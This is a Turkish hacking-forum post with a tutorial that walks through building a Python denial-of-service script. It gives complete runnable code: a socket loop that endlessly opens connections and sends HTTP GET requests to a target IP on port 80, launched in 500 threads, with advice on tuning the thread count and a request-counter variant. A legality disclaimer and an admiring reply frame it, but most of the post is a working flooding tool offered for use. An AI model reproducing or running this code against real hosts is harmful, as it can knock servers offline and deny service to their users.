Neler yeni

Yeni Phyton DDOS saldırısı (1 Viewer)

s0ng0ktrk

SON GÖKTÜRK
majorrr
Mesajlar
188
Credits
0
[url=https://hizliresim.com/IQCw63] [/URL]
Bu eğitimde Python'da bir penetrasyon testi betiği, yani bir DDOS betiği yazacağız. Bu program, bir sunucuyu o kadar çok istekle doldurmamızı sağlayacak ki, bir süre sonra artık yanıt veremeyecek ve kapanacak.

Ama size burada büyük bir uyarı vereyim! Size ait olmayan veya saldırı izniniz olmayan herhangi bir sunucuya DDOS saldırısı gerçekleştirmek son derece yasa dışıdır. Kendi sunucunuz dışında herhangi bir sunucuya yapılan saldırıları önermiyorum ve bu komut dosyasıyla ne yapacağınızdan sorumlu değilim. Bu gönderi tamamen eğiticidir ve Python ile ağ oluşturma ve programlamayı anlamanıza yardımcı olacaktır. Bu yüzden aptalca şeyler yapma!

DDOS nedir
DDOS, Dağıtılmış Hizmet Reddi anlamına gelir ve bir sunucunun kaynaklarını isteklerle doldurarak engellediğimiz bir saldırıdır. Genellikle bu tür saldırılar asla tek başına değil, botnet denilenlerin yardımıyla gerçekleştirilir.
[url=https://hizliresim.com/ONCxZv] [/URL]

Bir botnet'te, bir bilgisayar korsanı, onları zombi olarak kullanmak için birçok bilgisayarı ve sıradan insanların sunucularını enfekte eder . Bunları bir sunucuya toplu saldırı yapmak için kullanıyor. Tek bir DDOS komut dosyası yerine, artık binlerce tane çalıştırabilir. Er ya da geç, sunucu, sıradan bir kullanıcıya bile yanıt veremeyecek şekilde taleplerin miktarına boğulacaktır. Daha küçük ve daha zayıf sunucular için, bazen bir saldırgan onu indirmek için yeterlidir. Ancak, genellikle bu tür bir saldırı, saldırganların IP adresleri engellenerek engellenebilir.


DDOS Komut Dosyasını Uygulama
Python'da bir DDOS betiğinin uygulanması oldukça basittir. Yalnızca belirli bir bağlantı noktasındaki bir ana bilgisayara tekrar tekrar istek göndermemiz gerekir. Bu, soketlerle yapılabilir. Süreci hızlandırmak ve daha etkili hale getirmek için çoklu iş parçacığı da kullanacağız. Bu nedenle, bu eğitim için aşağıdaki kitaplıklara ihtiyaç duyulacaktır

Kod
Kod:
import socket
import threading

Şimdi ihtiyacımız olan ilk şey hedefin IP adresi, saldırmak istediğimiz port ve kullanmak istediğimiz sahte IP adresimiz. Bu tür bir "sahte" IP adresinin gerçekte kim olduğunuzu gizlemediğine dikkat edin. Sizi anonim yapmaz.

Kod
Kod:
target = '10.0.0.138'
fake_ip = '182.21.20.32'
port = 80

Daha önce de belirttiğim gibi, DDOS yasa dışıdır. Bu yüzden burada seçtiğiniz hedefe dikkat edin. Bu durumda, yönlendiricimin IP adresini evde seçtim. Ayrıca ev sunucunuzu, yazıcınızı veya hatta kendi web sitenizi de seçebilirsiniz. IP adresinizi bilmiyorsanız, komut satırınızı kullanabilir ve alan adına ping atabilirsiniz. Sahte bir IP adresi olarak rastgele ama yine de geçerli bir adres seçtim. Son olarak, HTTP olan 80 numaralı bağlantı noktasına saldırmaya karar verdim.

Kod

Kod:
def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
        s.close()

Bu saldırı işlevi, bireysel iş parçacıklarımızın her birinde çalışacak olan işlevdir. İçinde bir soket oluşturduğu, hedefe bağlandığı ve tekrar tekrar bir HTTP isteği gönderdiği sonsuz bir döngü başlatır. Elbette, başka bir bağlantı noktasına saldırıyorsanız, gönderdiğiniz istek türünü de değiştirmeniz gerekecektir.

Burada sahte IP adresimizi talebe enjekte ettiğimizi görebilirsiniz. Sunucuya gönderilebilmesi için isteğin kendisinin bayt olarak kodlanması gerekir. Her yinelemenin sonunda soketimizi kapatıyoruz.

Şimdi yapmamız gereken son şey, bu işlevi aynı anda çalıştıran birden çok iş parçacığı çalıştırmaktır. Fonksiyonu sadece çalıştıracak olsaydık, defalarca çok sayıda istek gönderirdi, ancak her zaman sadece bir biri diğerine olurdu. Çoklu iş parçacığı kullanarak birçok isteği aynı anda gönderebiliriz.

Kod
Kod:
for i in range(500):
    thread = threading.Thread(target=attack)
    thread.start()

Bu durumda, fonksiyonumuzu yürütecek 500 iş parçacığı başlatıyoruz. Elbette sayı ile oynayabilirsiniz. Belki 30 veya 50 zaten yeterlidir. Şimdi betiğimizi çalıştırdığımızda, hedefi DDOS yapacağız ama hiçbir şey görmeyeceğiz. Bazı bilgileri görmek istiyorsanız, önceden gönderilmiş istek miktarlarını yazdırabilirsiniz. Bunun saldırınızı yavaşlatacağına dikkat edin.

Kod
Kod:
attack_num = 0

def attack():
    while True:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target, port))
        s.sendto(("GET /" + target + " HTTP/1.1\r\n").encode('ascii'), (target, port))
        s.sendto(("Host: " + fake_ip + "\r\n\r\n").encode('ascii'), (target, port))
      
        global attack_num
        attack_num += 1
        print(attack_num)
      
        s.close()


Zaten kaç isteğin gönderildiğini izleyen değişken bir attack_num oluşturduk Her yinelemede bu sayıyı artırıp basıyoruz.

Bu eğitim için bu kadar Umarım bir şeyler öğrenmişsindir Sadece bu bilgiyle yasadışı şeyler yapmayın Yorum bırakmak için çekinmeyin Saygılarımla! Froxy.
Ellerine sağlık özellikle kodların işlevlerini açıklaman çok hoşuma gitti. Senin gibi coderlar çok az aramızda eline sağlık (y)
 

Bu konuyu görüntüleyen kullanıcılar